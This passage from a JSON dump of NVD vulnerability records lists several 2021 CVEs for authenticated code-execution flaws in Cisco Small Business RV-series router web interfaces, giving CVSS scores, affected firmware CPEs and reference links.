"cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:23", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1217", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1217"], "modified": "2021-01-19T18:59:00", "cpe": ["cpe:/o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware:-", "cpe:/o:cisco:rv130_vpn_router_firmware:-", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:-", "cpe:/o:cisco:rv110w_wireless-n_vpn_firewall_firmware:-"], "id": "CVE-2021-1217", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1217", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_wireless-n_vpn_firewall_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:49", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1190", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1190"], "modified": "2021-01-19T19:07:00", "cpe": ["cpe:/o:cisco:rv130_firmware:1.0.3.44", "cpe:/o:cisco:rv130w_firmware:1.0.3.44", "cpe:/o:cisco:rv110w_firmware:1.0.3.44", "cpe:/o:cisco:rv215w_firmware:1.0.3.44"], "id": "CVE-2021-1190", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1190", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.0.3.44:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:55", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1191", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1191"], "modified": "2021-01-19T19:06:00", "cpe": ["cpe:/o:cisco:rv130_firmware:1.0.3.44", "cpe:/o:cisco:rv130w_firmware:1.0.3.44", "cpe:/o:cisco:rv110w_firmware:1.0.3.44", "cpe:/o:cisco:rv215w_firmware:1.0.3.44"], "id": "CVE-2021-1191", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1191", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.0.3.44:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:20", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1167", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1167"], "modified": "2021-01-19T19:23:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.1.7", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1167", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1167", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:50", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T21:15:00", "type": "cve", "title": "CVE-2021-1189", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1189"], "modified": "2021-01-15T19:56:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1189", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1189", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:24", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1171", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1171"], "modified": "2021-01-19T19:20:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1171", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1171", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:30", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1174", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1174"], "modified": "2021-01-19T19:18:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1174", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1174", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:14", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1161", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1161"], "modified": "2021-01-19T19:44:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1161", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:30", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1175", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1175"], "modified": "2021-01-19T19:17:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1175", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1175", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:10", "description": "Multiple 